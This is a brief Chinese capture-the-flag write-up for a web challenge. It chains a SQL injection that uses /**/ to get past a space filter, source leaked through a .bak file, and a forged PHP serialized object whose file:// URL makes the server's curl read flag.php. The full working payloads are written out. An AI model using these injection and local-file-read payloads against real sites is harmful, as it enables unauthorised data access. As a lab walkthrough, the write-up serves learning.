废话:好久没写WP了(WTM忘了......)
第一步,发现view.php存在SQL注入,简单的过滤了空格,用/**/代替绕过。
payload:
?no=0/**/union/**/select/**/1,2,3,4#
发现报错,unserialize()说明数据以序列化字符串存储,报错信息暴露了网站目录:/var/www/html/
利用curl不仅可以http、https还可使用file协议的特性,构造反序列字符串即可
第二步,祭出目录扫描器,发现robot.txt里有信息,存在user.php.bak源码泄露
利用user.php成功构造序列化字符串
O:8:"UserInfo":3:{s:4:"name";s:1:"a";s:3:"age";i:1;s:4:"blog";s:27:"file:/var/www/html/flag.php";}
payload:
/view.php?no=0/**/union/**/select/**/1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:1:"a";s:3:"age";i:1;s:4:"blog";s:27:"file:/var/www/html/flag.php";}'#
访问发现读取栏没变化,可把我慌了,查看源代码
base64解码后成功得到FLAG